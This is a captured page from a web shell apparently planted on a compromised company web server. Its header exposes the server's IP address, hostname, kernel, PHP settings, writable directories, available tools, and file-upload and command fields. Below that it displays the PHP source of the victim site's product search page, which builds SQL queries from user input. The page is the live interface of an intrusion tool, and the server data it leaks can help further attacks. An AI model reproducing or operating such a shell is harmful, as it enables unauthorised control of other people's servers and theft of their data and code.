403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)rep-gaming.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)rep-gaming.com/results.php
<?php require("webadmin/configure.php");
$id =(int)$_GET['id']; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=7">
<title>REP ELECTRONICS LIMITED</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<script language=JavaScript>
<!--
var message="";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// --> 
</script>
<script type="text/JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<link rel="stylesheet" type="text/css" href="css/scrollable-horizontal.css">
<link rel="stylesheet" type="text/css" href="css/scrollable-buttons.css">

<script type="text/javascript" src="js142/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="js142/jquery.sifr-1.5.min.js"></script>

<script type="text/javascript" src="js142/jquery.swfobject.1-0-9.min.js"></script>
<script type="text/javascript" src="js142/jquery.fancybox-1.2.5.pack.js"></script>
<script type="text/javascript" src="js142/jquery-ui-1.7.2.custom.min.js"></script>
<script type="text/javascript" src="js142/jquery.tools.min.js"></script>
<script type="text/javascript" src="js142/jScrollPane.js"></script>
<script type="text/javascript" src="js142/jquery.cycle.lite.1.0.min.js"></script>
<script type="text/javascript" src="js142/docready.js"></script>
<script type="text/javascript" src="js/tooltip.js"></script>
</head>

<body>
<table width="730" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><table width="730" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="60"><a href="product.php?id=1" onMouseover="fixedtooltip('Audio', this, event, '150px')" onMouseout="delayhidetip()"><img src="images/icon_ga.jpg" width="60" height="60" border="0" class="img" /></a></td>
        <td width="10">&nbsp;</td>
        <td width="60"><a href="product.php?id=2" onMouseover="fixedtooltip('Entertainment Tablet', this, event, '150px')" onMouseout="delayhidetip()"><img src="images/icon_gc.jpg" width="60" height="60" border="0" class="img" /></a></td>
		<td width="10">&nbsp;</td>
		<td width="60"><a href="product.php?id=3" onMouseover="fixedtooltip('Electronics & Accessories', this, event, '150px')" onMouseout="delayhidetip()"><img src="images/icon_av.jpg" width="60" height="60" border="0" class="img" /></a></td>
        <td width="20">&nbsp;</td>
        <td width="500" align="left" valign="bottom"><table border="0" cellpadding="0" cellspacing="0" class="menu">
            <tr>
              <td width="100" align="center"><a href="main.php">HOME</a></td>
              <td width="100" align="center"><a href="about.php">ABOUT</a></td>
              <td width="100" align="center"><a href="product_index.php">PRODUCTS</a></td>
              <td width="100" align="center"><a href="news.php">NEWS</a></td>
              <td width="100" align="center"><a href="contact.php">CONTACT</a></td>
            </tr>
        </table></td>
        <td width="10">&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><table width="730" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="210">&nbsp;</td>
        <td width="10"><img src="images/frame_r1_c1.jpg" width="10" height="55" /></td>
        <td width="500" background="images/frame_r1_c2.jpg"><img src="images/frame_r1_c2.jpg" width="10" height="47" /></td>
        <td width="10"><img src="images/frame_r1_c3.jpg" width="10" height="55" /></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><table width="730" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="295"><table width="295" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td width="55" rowspan="4" align="right"><img src="frame/left.jpg" width="20" height="245" /></td>
            <td><img src="frame/top.jpg" width="220" height="20" /></td>
            <td width="20" rowspan="4"><img src="frame/right.jpg" width="20" height="245" /></td>
          </tr>
          <tr>
            <td width="220" height="205" bgcolor="#FFFFFF"><img src="images/contact.jpg" id="Image0"/></td>
            </tr>
          <tr>
            <td height="15"><img src="frame/bottom.jpg" width="220" height="20" /></td>
            </tr>
        </table></td>
        <td align="left" valign="top" style="background-color:#A8A9AD;">
		<div class="frame1">
          <table width="400" border="0" cellpadding="0" cellspacing="0">
		  <tr><td align="left" valign="top" class="whitetxt">
		  <p class="title">Search result</p>
		  <ul>
		  <?        $type =mysql_real_escape_string(htmlspecialchars($_GET['type']));
		  			$searchtxt =mysql_real_escape_string(htmlspecialchars($_GET['searchtxt']));
					$searchtxt = strtoupper($searchtxt);
					$searchtxt = strip_tags($searchtxt);
					$searchtxt = trim ($searchtxt);

					$str = explode(" " , $searchtxt);

					$len = count($str) - 1;
					$sql = '';
//					echo $str. " len = $len, $str[0]";		
					for ($x = 0; $x <= $len ; $x++){
						if (trim($str[$x]) <> ''){
							$sql .= "SELECT * ";
							$sql .= "FROM product left outer join prosub ";
							$sql .= "ON product.prosubid = prosub.prosubid ";
							$sql .= " join procat a on a.procatid = prosub.procatid ";
							if ($type >=1) {
							$sql .= "WHERE prosub.procatid = '".$type."' ";
							$sql .= "AND (productdesc like '%". $str[$x]."%' ";
							$sql .= "or productname like '%". $str[$x]."%' ";
							$sql .= "or prosub.prosubtype like '%". $str[$x]."%' )";
							} else {
							$sql .= "WHERE productdesc like '%". $str[$x]."%' ";
							$sql .= "or productname like '%". $str[$x]."%' ";
							$sql .= "or prosub.prosubtype like '%". $str[$x]."%' ";
							$sql .= "ORDER BY prosub.prosubsort asc "; 
							}
							/*$sql .= "SELECT * ";
							$sql .= "FROM product left outer join prosub ";
							$sql .= "ON product.prosubid = prosub.prosubid ";
							$sql .= "WHERE procatid = $type ";
							$sql .= "or productdesc like '%". $str[$x]."%' ";
							$sql .= "or productname like '%". $str[$x]."%' ";
							$sql .= "ORDER BY prosub.prosubsort asc "; */ 						
							if ($x <> $len)
								$sql .= " union ";		
						}
					}			
					//echo $sql;		
					$result = mysql_query($sql);					
					while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
					{					
				 ?>
		  <li><a href="detail.php?id=<? echo $row{'procattype'}; ?>&procatid=<? echo $row{'procatid'}; ?>&prosubid=<? echo $row{'prosubid'}; ?>&pid=<? echo $row{'productid'}; ?>" onMouseOver="MM_swapImage('Image0','','webadmin/productimagethumb/<? echo $row{'productimage'}; ?>',1)"><? echo $row{'productname'}; ?></a></li>
		  <? } 
			$numrows=mysql_num_rows($result);
				if ($numrows == 0)
					  {
					  echo "<span><p>Sorry, your search: &quot;" . $searchtxt . "&quot; returned zero results.</p></span>";
					  }?>
		  </ul>
		  </td></tr>
		  </table>
		  </div>          </td>
        <td width="10"><img src="images/frame_r2_c3.jpg" width="10" height="245" /></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><table width="730" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="210">&nbsp;</td>
        <td width="10"><img src="images/frame_r3_c1.jpg" width="10" height="75" /></td>
        <td width="500" align="left" background="images/frame_r3_c2.jpg">
		<!-- "previous page" action -->
		<a class="prevPage browse left"></a>		
		<!-- root element for scrollable -->
		<div class="scrollable">			
			<!-- root element for the items -->
			<div class="items">	
				<?php
					$sql = "SELECT * FROM procat ";
					$sql .= "ORDER BY procattype ASC, procatsort ASC ";	
					$result = mysql_query($sql);
					while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) {
					echo '<img src="webadmin/brand/'.$row{'procatimage2'}.'" onmouseover="this.src=\'webadmin/brand/'.$row{'procatimage2'}.'\'" onmouseout="this.src=\'webadmin/brand/'.$row{'procatimage2'}.'\'" width="54" height="54" border="0" class="brandimg" title="'.$row{'procatname'}.'" alt="'.$row{'procatname'}.'" onclick=location.href="pcat.php?id='. $row{'procattype'} .'&procatid='. $row{'procatid'} .'" />';
					}
				?>	
			</div>
		</div>				
		<a class="nextPage browse right"></a>		
		<br style="clear:both;"></td>
        <td width="10"><img src="images/frame_r3_c3.jpg" width="10" height="75" /></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><form action="results.php" name="searchForm" method="get"><table width="730" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="212"><a href="main.php"><img src="images/logo.jpg" width="212" height="66" border="0" /></a></td>
        <td align="right"><input type="text" name="searchtxt" value="<?=$searchtxt?>" class="input"/>
            <select name="type">
              <option value="0" <? if (($type=='0') || ($type=='')) echo 'selected'; ?>>Product</option>
			  <?php
				$sql = "SELECT * FROM procat ";
				$sql .= "ORDER BY procattype ASC, procatsort ASC ";	
				$result = mysql_query($sql);
				while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) {	
					echo "<option value='". $row{'procatid'} ."' ";
					if ($row{'procatid'} == $type) echo 'selected="selected"';
					echo " >". $row{'procatname'} ."</option>\n";
				}	
			  ?>
            </select>
            <img src="images/searchbtn.jpg" align="absmiddle" onclick="searchForm.submit()" />         </td>
      </tr>
    </table></form></td>
  </tr>
  <tr>
    <td align="right" class="footertxt">© 2014 Copyright reserved by REP ELECTRONICS LIMITED | <a href="disclaimer.php">Disclaimer</a><br />
      Powered by <a href="http://www.onesolution.com.hk" target="_blank">One Solution Limited</a>.</td>
  </tr>
</table>


</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit